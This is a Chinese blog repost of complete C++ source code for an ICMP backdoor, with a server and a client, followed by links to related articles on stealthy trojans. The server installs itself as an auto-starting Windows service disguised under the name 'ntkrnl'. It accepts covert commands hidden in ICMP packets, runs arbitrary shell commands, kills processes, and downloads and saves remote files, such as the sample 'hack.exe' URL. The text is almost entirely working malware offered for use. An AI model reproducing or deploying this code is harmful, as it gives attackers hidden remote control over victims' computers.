vc++ ICMP后门后门程序

最新推荐文章于 2024-02-25 16:18:14 发布
最新推荐文章于 2024-02-25 16:18:14 发布
阅读量2.1k 收藏 1
点赞数
分类专栏: VC++

server.cpp

#include <winsock2.h>
#include <stdio.h>
#include <urlmon.h> 
#include <tlhelp32.h>
#pragma comment(lib, "Urlmon.lib")
#pragma comment(lib, "ws2_32.lib")

#define ICMP_PASSWORD 1234                                             
#define STATUS_FAILED 0xFFFF
#define MAX_PACKET 6500
#define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s))

/* The IP header */
typedef struct iphdr {
	unsigned int h_len:4; //4位首部长度
	unsigned int version:4; //IP版本号,4表示IPV4
	unsigned char tos; //8位服务类型TOS
	unsigned short total_len; //16位总长度(字节)
	unsigned short ident; //16位标识
	unsigned short frag_and_flags; //3位标志位
	unsigned char ttl; //8位生存时间 TTL
	unsigned char proto; //8位协议 (TCP, UDP 或其他)
	unsigned short checksum; //16位IP首部校验和
	unsigned int sourceIP; //32位源IP地址
	unsigned int destIP; //32位目的IP地址
}IpHeader;

//定义ICMP首部
typedef struct _ihdr 
{
	BYTE i_type; //8位类型
	BYTE i_code; //8位代码
	USHORT i_cksum; //16位校验和 
	USHORT i_id; //识别号(一般用进程号作为识别号)
	USHORT i_seq; //报文序列号 
	ULONG timestamp; //时间戳
}IcmpHeader;
char arg[256];
char buffer[2048] = {0};//管道输出的数据
void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数
void fill_icmp_data(char * icmp_data);
void pslist(void);
BOOL killps(DWORD id);//杀进程函数
void send(void);
char *ICMP_DEST_IP;
USHORT checksum(USHORT *buffer, int size);

HANDLE                hMutex;
SERVICE_STATUS        ServiceStatus;
SERVICE_STATUS_HANDLE ServiceStatusHandle;
void  WINAPI ICMP_CmdStart(DWORD,LPTSTR *);
void  WINAPI CmdControl(DWORD);
DWORD WINAPI CmdService(LPVOID);
void  InstallCmdService(void);
void  RemoveCmdService(void);
void  usage(char *par);
int main(int argc,char *argv[])
{
	SERVICE_TABLE_ENTRY DispatchTable[]={{"ntkrnl",ICMP_CmdStart},{NULL,NULL}};
	if(argc==2)
	{
		if(!stricmp(argv[1],"-install"))
		{
			//usage(argv[0]);
			InstallCmdService();
			printf("InstallCmdService\n");
		}
		else if(!stricmp(argv[1],"-remove"))
		{
			//usage(argv[0]);
			RemoveCmdService();
			printf("RemoveCmdService\n");
		}
		else usage(argv[0]);
		return 0;
	}
	else usage(argv[0]);


	StartServiceCtrlDispatcher(DispatchTable);
	return 0;
}
void WINAPI ICMP_CmdStart(DWORD dwArgc,LPTSTR *lpArgv)
{
	HANDLE    hThread;
	ServiceStatus.dwServiceType             = SERVICE_WIN32;
	ServiceStatus.dwCurrentState            = SERVICE_START_PENDING;
	ServiceStatus.dwControlsAccepted        = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
	ServiceStatus.dwServiceSpecificExitCode = 0;
	ServiceStatus.dwWin32ExitCode           = 0;
	ServiceStatus.dwCheckPoint              = 0;
	ServiceStatus.dwWaitHint                = 0;
	ServiceStatusHandle=RegisterServiceCtrlHandler("ntkrnl",CmdControl);
	if(ServiceStatusHandle==0)
	{
		OutputDebugString("RegisterServiceCtrlHandler Error !\n");
		return ;
	}
	ServiceStatus.dwCurrentState = SERVICE_RUNNING;
	ServiceStatus.dwCheckPoint   = 0;
	ServiceStatus.dwWaitHint     = 0;

	if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
	{
		OutputDebugString("SetServiceStatus in CmdStart Error !\n");
		return ;
	}
	hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL);
	if(hThread==NULL)
	{
		OutputDebugString("CreateThread in CmdStart Error !\n");
	}
	return ;
}
void WINAPI CmdControl(DWORD dwCode)
{
	switch(dwCode)
	{
	case SERVICE_CONTROL_PAUSE:
		ServiceStatus.dwCurrentState = SERVICE_PAUSED;
		break;
	case SERVICE_CONTROL_CONTINUE:
		ServiceStatus.dwCurrentState = SERVICE_RUNNING;
		break;
	case SERVICE_CONTROL_STOP:      
		WaitForSingleObject(hMutex,INFINITE);
		ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
		ServiceStatus.dwWin32ExitCode = 0;
		ServiceStatus.dwCheckPoint    = 0;
		ServiceStatus.dwWaitHint      = 0;
		if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
		{
			OutputDebugString("SetServiceStatus in CmdControl in Switch Error !\n");
		}
		ReleaseMutex(hMutex);
		CloseHandle(hMutex);
		return ;
	case SERVICE_CONTROL_INTERROGATE:
		break;
	default:
		break;
	}
	if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
	{
		OutputDebugString("SetServiceStatus in CmdControl out Switch Error !\n");
	}
	return ;
}
DWORD WINAPI CmdService(LPVOID lpParam)//这里是服务的主函数,把你的代码写在这里就可以成为服务
{   
	char *icmp_data;
	int bread,datasize,retval;
	SOCKET sockRaw = (SOCKET)NULL;
	WSADATA wsaData;
	struct sockaddr_in dest,from;
	int fromlen = sizeof(from);
	int timeout = 2000;
	char *recvbuf;

	if ((retval = WSAStartup(MAKEWORD(2,1),&wsaData)) != 0)
	{
		printf("WSAStartup failed: %s\n",retval);
		ExitProcess(STATUS_FAILED);
	}
	sockRaw = WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED);
	if (sockRaw == INVALID_SOCKET)
	{
		printf("WSASocket() failed: %s\n",WSAGetLastError());
		ExitProcess(STATUS_FAILED);
	}
	__try{
		bread = setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,(char*)&timeout,sizeof(timeout));
		if(bread == SOCKET_ERROR) __leave;

		memset(&dest,0,sizeof(dest));
		dest.sin_family = AF_INET;
		datasize=0;
		datasize += sizeof(IcmpHeader); 
		icmp_data =(char*)xmalloc(MAX_PACKET);
		recvbuf = (char*)xmalloc(MAX_PACKET);
		if (!icmp_data) {
			//fprintf(stderr,"HeapAlloc failed %d\n",GetLastError());
			__leave;
		}
		memset(icmp_data,0,MAX_PACKET);
		for(;;) {
			int bwrote;
			bwrote = sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest));
			bread = recvfrom(sockRaw,recvbuf,MAX_PACKET,0,(struct sockaddr*)&from,&fromlen);
			if (bread == SOCKET_ERROR)
			{
				if (WSAGetLastError() == WSAETIMEDOUT)continue;
				__leave;
			}
			decode_resp(recvbuf,bread,&from);
			Sleep(200);
			memset(recvbuf,0,sizeof(recvbuf));
		}
	}
	__finally {
		if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
		WSACleanup();
	}
	return 0;
}


void InstallCmdService(void)
{
	SC_HANDLE        schSCManager;
	SC_HANDLE        schService;
	char             lpCurrentPath[MAX_PATH];
	char             lpImagePath[MAX_PATH];
	char             *lpHostName;
	WIN32_FIND_DATA  FileData;
	HANDLE           hSearch;
	DWORD            dwErrorCode;
	SERVICE_STATUS   InstallServiceStatus;

	GetSystemDirectory(lpImagePath,MAX_PATH);
	strcat(lpImagePath,"\\ntkrnl.exe");
	lpHostName=NULL;

	printf("Transmitting File ... ");
	hSearch=FindFirstFile(lpImagePath,&FileData);
	if(hSearch==INVALID_HANDLE_VALUE)
	{
		GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
		if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0) 
		{
			dwErrorCode=GetLastError();
			if(dwErrorCode==5)
			{
				printf("Failure ... Access is Denied !\n");         
			}
			else
			{
				printf("Failure !\n");
			}
			return ;
		}
		else
		{
			printf("Success !\n");
		}
	}
	else
	{
		printf("already Exists !\n");
		FindClose(hSearch);
	}
	schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
	if(schSCManager==NULL)
	{
		printf("Open Service Control Manager Database Failure !\n");
		return ;
	}
	printf("Creating Service .... ");
	schService=CreateService(schSCManager,"ntkrnl","ntkrnl",SERVICE_ALL_ACCESS,
		SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,
		SERVICE_ERROR_IGNORE,"ntkrnl.exe",NULL,NULL,NULL,NULL,NULL); 
	if(schService==NULL)
	{
		dwErrorCode=GetLastError();
		if(dwErrorCode!=ERROR_SERVICE_EXISTS)
		{
			printf("Failure !\n");
			CloseServiceHandle(schSCManager);
			return ;
		}
		else
		{
			printf("already Exists !\n");
			schService=OpenService(schSCManager,"ntkrnl",SERVICE_START);
			if(schService==NULL)
			{
				printf("Opening Service .... Failure !\n");
				CloseServiceHandle(schSCManager);
				return ;
			}
		}
	}
	else
	{
		printf("Success !\n");
	}
	printf("Starting Service .... ");
	if(StartService(schService,0,NULL)==0)                         
	{
		dwErrorCode=GetLastError();
		if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
		{
			printf("already Running !\n");
			CloseServiceHandle(schSCManager);  
			CloseServiceHandle(schService);
			return ;
		}
	}
	else
	{
		printf("Pending ... ");
	}
	while(QueryServiceStatus(schService,&InstallServiceStatus)!=0)           
	{
		if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING)
		{
			Sleep(100);
		}
		else
		{
			break;
		}
	}
	if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING)
	{
		printf("Failure !\n");                       
	}
	else
	{
		printf("Success !\n");
	}
	CloseServiceHandle(schSCManager);
	CloseServiceHandle(schService);
	return ;
}
void RemoveCmdService(void) 
{
	SC_HANDLE        schSCManager;
	SC_HANDLE        schService;
	char             lpImagePath[MAX_PATH];
	char             *lpHostName;
	WIN32_FIND_DATA  FileData;
	SERVICE_STATUS   RemoveServiceStatus;
	HANDLE           hSearch;
	DWORD            dwErrorCode;

	GetSystemDirectory(lpImagePath,MAX_PATH);
	strcat(lpImagePath,"\\ntkrnl.exe");
	lpHostName=NULL;

	schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
	if(schSCManager==NULL)
	{
		printf("Opening SCM ......... ");
		dwErrorCode=GetLastError();
		if(dwErrorCode!=5)
		{
			printf("Failure !\n"); 
		}
		else
		{
			printf("Failuer ... Access is Denied !\n");
		}
		return ;
	}
	schService=OpenService(schSCManager,"ntkrnl",SERVICE_ALL_ACCESS);
	if(schService==NULL) 
	{
		printf("Opening Service ..... ");
		dwErrorCode=GetLastError();
		if(dwErrorCode==1060)
		{
			printf("no Exists !\n");
		}
		else
		{
			printf("Failure !\n");
		}
		CloseServiceHandle(schSCManager);
	}
	else
	{
		printf("Stopping Service .... ");
		if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
		{
			if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
			{
				printf("already Stopped !\n"); 
			}
			else
			{
				printf("Pending ... ");
				if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
				{
					while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)         
					{
						Sleep(10);
						QueryServiceStatus(schService,&RemoveServiceStatus);
					}
					if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
					{
						printf("Success !\n");
					}
					else
					{
						printf("Failure !\n");
					}
				}
				else
				{
					printf("Failure !\n");          
				}
			}
		}
		else
		{
			printf("Query Failure !\n");
		}
		printf("Removing Service .... ");     
		if(DeleteService(schService)==0)
		{
			printf("Failure !\n");   
		}
		else
		{
			printf("Success !\n");
		}
	}
	CloseServiceHandle(schSCManager);        
	CloseServiceHandle(schService);
	printf("Removing File ....... ");
	Sleep(1500);
	hSearch=FindFirstFile(lpImagePath,&FileData);
	if(hSearch==INVALID_HANDLE_VALUE)
	{
		printf("no Exists !\n");
	}
	else
	{
		if(DeleteFile(lpImagePath)==0)
		{
			printf("Failure !\n");               
		}
		else
		{
			printf("Success !\n");
		}
		FindClose(hSearch);
	}
	return ;
}
void decode_resp(char *buf, int bytes,struct sockaddr_in *from) 
{

	IpHeader *iphdr;
	IcmpHeader *icmphdr;
	unsigned short iphdrlen;
	iphdr = (IpHeader *)buf;
	iphdrlen = iphdr->h_len * 4 ; 
	icmphdr = (IcmpHeader*)(buf + iphdrlen);
	if(icmphdr->i_seq==ICMP_PASSWORD)//密码正确则输出数据段
	{
		ICMP_DEST_IP=inet_ntoa(from->sin_addr);//取得ICMP包的源地址
		memcpy(arg,buf+iphdrlen+12,256);
		if (!memcmp(arg,"pskill",6))
		{
			killps(atoi(strstr(arg," ")));
			memcpy(buffer,"Process is Killed!",sizeof("Process is Killed!"));
			send();
		}

		else if (!memcmp(arg,"pslist",6)){pslist();send();}
		else if (!strcmp(arg,"remove\n"))
		{
			RemoveCmdService();
			memcpy(buffer,"Service Removed!",sizeof("Service Removed!"));
			send();
			return;
		}
		************    http下载   *************
		else if (!memcmp(arg,"http://",7))   
		{
			if(char *FileName=strstr(arg,"-"))
			{

				char url[200];//保存网址的数组
				memset(url,0,200);
				memcpy(url,arg,int(FileName-arg-1));
				char fname[MAX_PATH];
				GetSystemDirectory(fname,MAX_PATH);
				FileName++;
				strcat(fname,"//");
				strcat(fname,FileName);
				*strstr(fname,"\n")=NULL;
				HRESULT hRet=URLDownloadToFile(0,url,fname,0,0);
				memset(buffer,0,sizeof(buffer));
				if(hRet==S_OK) memcpy(buffer,"Download OK!\n",sizeof("Download OK\n"));
				else 
					memcpy(buffer,"Download Failure!\n",sizeof("Download Failure!\n"));
				send();
				return;
			}
		}
		//*******************************************
		else{
			SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出
			HANDLE hRead,hWrite;
			sa.nLength = sizeof(SECURITY_ATTRIBUTES);
			sa.lpSecurityDescriptor = NULL;
			sa.bInheritHandle = TRUE;
			if (!CreatePipe(&hRead,&hWrite,&sa,0)) 
			{
				printf("Error On CreatePipe()");
				return;
			}

			STARTUPINFO si;
			PROCESS_INFORMATION pi; 
			si.cb = sizeof(STARTUPINFO);
			GetStartupInfo(&si); 
			si.hStdError = hWrite;
			si.hStdOutput = hWrite;
			si.wShowWindow = SW_HIDE;
			si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
			char cmdline[270];
			GetSystemDirectory(cmdline,MAX_PATH+1);
			strcat(cmdline,"//cmd.exe /c");
			strcat(cmdline,arg);
			if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) 
			{
				printf("Error on CreateProcess()");
				return;
			}
			CloseHandle(hWrite);


			DWORD bytesRead;
			for(;;){
				if (!ReadFile(hRead,buffer,2048,&bytesRead,NULL))break;
				Sleep(200);
			}
			//printf("%s",buffer);
			/
			//发送输出数据
			send();
		}
		

	}
	//else printf("Other ICMP Packets!\n");
	//printf(endl; 
}


USHORT checksum(USHORT *buffer, int size) 
{
	unsigned long cksum=0;
	while(size >1) 
	{
		cksum+=*buffer++;
		size -=sizeof(USHORT);
	}
	if(size ) {
		cksum += *(UCHAR*)buffer;
	}
	cksum = (cksum >> 16) + (cksum & 0xffff);
	cksum += (cksum >>16);
	return (USHORT)(~cksum);
}

void fill_icmp_data(char * icmp_data)
{
	IcmpHeader *icmp_hdr;
	char *datapart;
	icmp_hdr = (IcmpHeader*)icmp_data;
	icmp_hdr->i_type = 0;
	icmp_hdr->i_code = 0;
	icmp_hdr->i_id = (USHORT) GetCurrentProcessId();
	icmp_hdr->i_cksum = 0;
	icmp_hdr->i_seq =4321;
	icmp_hdr->timestamp = GetTickCount(); //设置时间戳
	datapart = icmp_data + sizeof(IcmpHeader);
	memcpy(datapart,buffer,strlen(buffer));
	//for(int i=0;i<sizeof(buffer);i++) datapart[i]=buffer[i]; 
}
void  usage(char *par)
{
	printf("\t\t=====Welcome to www.hackerxfiles.net======\n");
	printf("\n");
	printf("\t\t---[ ICMP-Cmd v1.0 beta, by gxisone   ]---\n");
	printf("\t\t---[ E-mail: gxisone@hotmail.com      ]---\n");
	printf("\t\t---[                        2003/8/15 ]---\n");
	printf("\n");
	printf("\t\tUsage: %s -install (to install service)\n",par);
	printf("\t\t       %s -remove (to remove service)\n",par);
	printf("\n");
	return ;

}
void send(void)
{
	WSADATA wsaData;
	SOCKET sockRaw = (SOCKET)NULL;
	struct sockaddr_in dest;
	int bread,datasize,retval,bwrote;
	int timeout = 1000;
	char *icmp_data;
	if((retval=WSAStartup(MAKEWORD(2,1),&wsaData)) != 0) ExitProcess(STATUS_FAILED);
	if((sockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED))
		==INVALID_SOCKET) ExitProcess(STATUS_FAILED);
	__try
	{
		if((bread=setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,sizeof(timeout)))==SOCKET_ERROR) __leave;
		//设置发送超时
		memset(&dest,0,sizeof(dest));
		dest.sin_family = AF_INET;
		dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP);
		datasize=strlen(buffer);
		datasize+=sizeof(IcmpHeader); 
		icmp_data=(char*)xmalloc(MAX_PACKET);
		if(!icmp_data) __leave;
		memset(icmp_data,0,MAX_PACKET);
		fill_icmp_data(icmp_data); //填充ICMP报文
		((IcmpHeader*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, datasize); //计算校验和
		bwrote=sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest)); //发送报文
		if (bwrote == SOCKET_ERROR)
		{
			//if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out\n");
			//printf("sendto failed:"<<WSAGetLastError()<<endl;
			__leave;
		}
		//printf("Send Packet to %s Success!\n"<<ICMP_DEST_IP<<endl;
	}

	__finally 
	{
		if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
		WSACleanup();
	}
	memset(buffer,0,sizeof(buffer));
	Sleep(200);
}
void pslist(void)
{
	HANDLE hProcessSnap = NULL;
	PROCESSENTRY32 pe32= {0};
	hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hProcessSnap == (HANDLE)-1)
	{
		printf("\nCreateToolhelp32Snapshot() failed:%d",GetLastError());
		return ;
	}
	pe32.dwSize = sizeof(PROCESSENTRY32);
	printf("\nProcessName     ProcessID");
	if (Process32First(hProcessSnap, &pe32))
	{
		char a[5];
		do
		{
			strcat(buffer,pe32.szExeFile);
			strcat(buffer,"\t\t");
			itoa(pe32.th32ProcessID,a,10);
			strcat(buffer,a);
			strcat(buffer,"\n");
			//printf("\n%-20s%d",pe32.szExeFile,pe32.th32ProcessID);
		}
		while (Process32Next(hProcessSnap, &pe32));
	}
	else
	{
		printf("\nProcess32Firstt() failed:%d",GetLastError());
	}
	CloseHandle (hProcessSnap);
	return;
}
BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege)//提示权限
{
	TOKEN_PRIVILEGES tp;
	LUID luid;
	if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid))
	{
		printf("\nLookupPrivilegeValue error:%d", GetLastError() ); 
		return FALSE; 
	}
	tp.PrivilegeCount = 1;
	tp.Privileges[0].Luid = luid;
	if (bEnablePrivilege)
		tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	else
		tp.Privileges[0].Attributes = 0;
	// Enable the privilege or disable all privileges.
	AdjustTokenPrivileges(
		hToken, 
		FALSE, 
		&tp, 
		sizeof(TOKEN_PRIVILEGES), 
		(PTOKEN_PRIVILEGES) NULL, 
		(PDWORD) NULL); 
	// Call GetLastError to determine whether the function succeeded.
	if (GetLastError() != ERROR_SUCCESS) 
	{ 
		printf("AdjustTokenPrivileges failed: %u\n", GetLastError() ); 
		return FALSE; 
	} 
	return TRUE;
}

BOOL killps(DWORD id)//杀进程函数
{
	HANDLE hProcess=NULL,hProcessToken=NULL;
	BOOL IsKilled=FALSE,bRet=FALSE;
	__try
	{
		if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken))
		{
			printf("\nOpen Current Process Token failed:%d",GetLastError());
			__leave;
		}
		//printf("\nOpen Current Process Token ok!");
		if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE))
		{
			__leave;
		}
		printf("\nSetPrivilege ok!");
		if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL)
		{
			printf("\nOpen Process %d failed:%d",id,GetLastError());
			__leave;
		}
		//printf("\nOpen Process %d ok!",id);
		if(!TerminateProcess(hProcess,1))
		{
			printf("\nTerminateProcess failed:%d",GetLastError());
			__leave;
		}
		IsKilled=TRUE;
	}
	__finally
	{
		if(hProcessToken!=NULL) CloseHandle(hProcessToken);
		if(hProcess!=NULL) CloseHandle(hProcess);
	}
	return(IsKilled);
}

client.cpp 

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib,"ws2_32.lib")
char SendMsg[256];
/* The IP header */
typedef struct iphdr {
	unsigned int h_len:4; //4位首部长度
	unsigned int version:4; //IP版本号,4表示IPV4
	unsigned char tos; //8位服务类型TOS
	unsigned short total_len; //16位总长度(字节)
	unsigned short ident; //16位标识
	unsigned short frag_and_flags; //3位标志位
	unsigned char ttl; //8位生存时间 TTL
	unsigned char proto; //8位协议 (TCP, UDP 或其他)
	unsigned short checksum; //16位IP首部校验和
	unsigned int sourceIP; //32位源IP地址
	unsigned int destIP; //32位目的IP地址
}IpHeader;


typedef struct _ihdr
{
	BYTE i_type;//8位类型
	BYTE i_code; //8位代码
	USHORT i_cksum;//16位校验和
	USHORT i_id;//识别号(一般用进程号作为识别号)
	USHORT i_seq;//报文序列号
	ULONG timestamp;//时间截
} IcmpHeader;
#define STATUS_FAILED 0xFFFF

#define MAX_PACKET 2000
char arg[1450];
#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s))

void fill_icmp_data(char *, int);
USHORT checksum(USHORT *, int);
void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数
void help(void);
void usage(char * prog);
int main(int argc, char *argv[])
{
	char *ICMP_DEST_IP; //目标主机的IP
	char *recvbuf;
	if(argc!=2)
	{
		usage(argv[0]);
		return 0;
	}
	ICMP_DEST_IP=argv[1];//取得目标主机IP
	WSADATA wsaData;
	SOCKET sockRaw;
	struct sockaddr_in dest,from;
	int datasize;
	int fromlen=sizeof(from);
	char *icmp_data;


	if(WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
	{
		fprintf(stderr, "WSAStartup failed: %d\n", GetLastError());
		ExitProcess(STATUS_FAILED);
	}
	sockRaw=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
	int timeout=1000;
	setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *) &timeout, sizeof(timeout));
	timeout=4000;
	setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, (char *) &timeout, sizeof(timeout));
	memset(&dest,0,sizeof(dest));
	dest.sin_addr.s_addr=inet_addr(ICMP_DEST_IP);
	dest.sin_family=AF_INET;
	usage(argv[0]);
	__try{
		for(;;){
			printf("ICMP-CMD>");
			fgets(SendMsg,1024,stdin);//取得命令行,保存在SendMsg数组中
			if(!strcmp(SendMsg,"Q\n")||!strcmp(SendMsg,"q\n"))ExitProcess(0);
			if(!strcmp(SendMsg,"\n"))continue;
			if(!strcmp(SendMsg,"H\n")||!strcmp(SendMsg,"h\n")){help();continue;}
			if(!memcmp(SendMsg,"http://",7))
				if(!strstr(SendMsg,"-")){
					printf("\nFileName Error. Use ");
					continue;
				}
				datasize=strlen(SendMsg);
				datasize+=sizeof(IcmpHeader);
				printf("ICMP packet size is %d",datasize);
				icmp_data= (char*)xmalloc(MAX_PACKET);
				recvbuf= (char *)xmalloc(MAX_PACKET);
				memset(icmp_data,0, MAX_PACKET);
				fill_icmp_data(icmp_data, datasize);
				((IcmpHeader *)icmp_data)->i_cksum=0;
				((IcmpHeader *)icmp_data)->i_cksum=checksum((USHORT *)icmp_data, datasize);
				int bwrote=sendto(sockRaw, icmp_data, datasize, 0, (struct sockaddr *) &dest, sizeof(dest));
				if (bwrote == SOCKET_ERROR)
				{
					if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out\n");
					fprintf(stderr,"sendto failed: %d\n",WSAGetLastError());
				}
				if (bwrote<datasize ) {//没有把所有的数据发送出去,也出错了。
					return 0;
				}
				printf("\nSend Packet to %s Success!\n",argv[1]);
				DWORD start = GetTickCount();
				for(;;){
					if((GetTickCount() - start) >= 1000) break;
					memset(recvbuf,0,MAX_PACKET);
					int bread=recvfrom(sockRaw, recvbuf, MAX_PACKET, 0, (struct sockaddr *) &from, &fromlen);
					if(bread == SOCKET_ERROR)
					{
						if(WSAGetLastError() == WSAETIMEDOUT)
						{
							printf("timed out\n");
							break;
						}
						fprintf(stderr, "recvfrom failed: %d\n", WSAGetLastError());
						break;
					}
					decode_resp(recvbuf, bread, &from);
				}
		}//end for
	}//end try


	__finally
	{
		if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
		WSACleanup();
	}
	return 0;
}

USHORT checksum(USHORT *buffer, int size)
{
	unsigned long cksum=0;
	while(size > 1)
	{
		cksum+=*buffer++;
		size-=sizeof(USHORT);
	}
	if(size)
	{
		cksum+=*(UCHAR *)buffer;
	}
	cksum=(cksum >> 16) + (cksum & 0xffff);
	cksum+=(cksum >> 16);
	return(USHORT) (~cksum);
}
void fill_icmp_data(char *icmp_data, int datasize)
{
	IcmpHeader *icmp_hdr;
	char *datapart;
	icmp_hdr= (IcmpHeader *)icmp_data;
	icmp_hdr->i_type=0;
	icmp_hdr->i_code=0;
	icmp_hdr->i_id=(USHORT)GetCurrentProcessId();
	icmp_hdr->timestamp =GetTickCount();
	icmp_hdr->i_seq=1234;
	datapart=icmp_data + sizeof(IcmpHeader);
	memcpy(datapart,SendMsg,sizeof(SendMsg));
}
void usage(char * prog)
{
	printf("\t\t=====Welcome to www.hackerxfiles.net======\n");
	printf("\n");
	printf("\t\t---[ ICMP-Cmd v1.0 beta, by gxisone   ]---\n");
	printf("\t\t---[ E-mail:    gxisone@hotmail.com   ]---\n");
	printf("\t\t---[                      2003/8/15   ]---\n");
	printf("\t\tusage: %s RemoteIP\n",prog);
	printf("\t\tCtrl+C or Q/q to Quite        H/h for help\n");
}


void decode_resp(char *buf, int bytes,struct sockaddr_in *from) 
{
	memset(arg,0,sizeof(arg));
	IpHeader *iphdr;
	IcmpHeader *icmphdr;
	unsigned short iphdrlen;
	iphdr = (IpHeader *)buf;
	iphdrlen = iphdr->h_len * 4 ; 
	icmphdr = (IcmpHeader*)(buf + iphdrlen);
	if(icmphdr->i_seq==4321)//密码正确则输出数据段
	{
		printf("%d bytes from %s:",bytes, inet_ntoa(from->sin_addr));
		printf(" IcmpType %d",icmphdr->i_type);
		printf(" IcmpCode %d",icmphdr->i_code);
		printf("\n");
		memcpy(arg,buf+iphdrlen+12,1450);
		printf("%s",arg);
	}
	else 
		printf("Other ICMP Packets!\n");
}
void help(void)
{
	printf("\n");
	printf("[http://127.0.0.1/hack.exe -admin.exe]  (Download Files. Parth is system32)\n");
	printf("[pslist]        (List the Process)\n");
	printf("[pskill ID]     (Kill the Process)\n");
	printf("Command         (run the command)\n"); 
	printf("\n");

}

http://blog.csdn.net/itcastcpp/article/details/4034302

yunshouhu
关注
专栏目录
vc++实现无进程无DLL无硬盘文件无启动项的ICMP后门后门程序
尹成的技术博客
03-29 9730
客户端 #include #include #include #pragma comment(lib,"ws2_32.lib")char SendMsg[256];/* The IP header */typedef struct iphdr {unsigned int h_len:4; //4位首部长度unsigned int version:4; //IP版本号,4表示I
ICMP后门
08-21
icmp可以穿透防火墙的原因 当我们ping别人时,我们发出的是类型为8的ICMP数据包,而别人收到这个数据包就会返回一个类型为0的ICMP数据包。防火墙允许我们ping别人,实际上就是允许类型为8的ICMP包出去同时允许类型...
Byshell:无进程无DLL无硬盘文件无启动项
weixin_30381317的博客
11-13 149
怎样隐藏自身的进程?一个普遍采用的方法就是远程线程注射。但它最大的问题是注射代码到了远程进程的地址空间后,由于地址空间的变化,依赖于原来地址空间的所有直接寻址指令需要重定位。这点对汇编老手来手是很容易理解的,对高级语言程序编写者来说这意味着所有显式和非显式的全局变量(如API地址和字符串)都需要进行手工重定位。 相比于病毒程序,我们很幸福,因为我们的的注射器可以同时向远程进程注射一个“全局变量...
无进程无DLL无硬盘文件
08-28 1245
 下一个问题是启动项和文件。Ntboot.exe是后门的注射器,将自己作为服务启动,我们决不能让管理员发现服务键值。怎么办?这个也是农民前辈提出的思想:先删除所有后门文件和服务,设定一个关机通知和一个一键关机钩子,在即将关机的时候写入文件和服务项。同样的,一开机这个服务只要启动了就会先把自己删除。这样就实现了无文件和无启动项。管理员用注册表对比将不能发现异常,也无处寻找我们的后门文件。看一下设定一
无dll无进程木马源代码
benny5609的专栏
02-27 1121
#include//#include#include#include#pragma comment(lib,"Shlwapi.lib")//参数结构 ;typedef struct _RemotePara{DWORD dwLoadLibrary;DWORD dwFreeLibrary;DWORD dwGetProcAddress;DWORD dwGetModuleHandle;DWORD dwWS
ICMP.rar_icmp_icmp后门_后门
09-24
icmp协议的后门,采用无连接协议.不开端口不容易查杀
ICMP-Back.rar_back_code tcp door_icmp_icmp后门
09-21
一般的后门都是面向连接的(基于TCP),容易被发现,而ICMP后门代码是基于UDP的,是面向非连接的,不容易被发现,本程序通过C++实现ICMP后门
基于ICMP的ping程序_基于ICMP_基于ICMP的ping程序_
10-01
标题中的“基于ICMP的ping程序”是指使用Internet控制消息协议(ICMP)来实现的网络诊断工具,类似于我们常见的Windows系统自带的`ping`命令。这个程序的主要目的是检查网络连通性,通过向目标主机发送ICMP回显请求...
无进程DLL木马的又一开发思路与实现
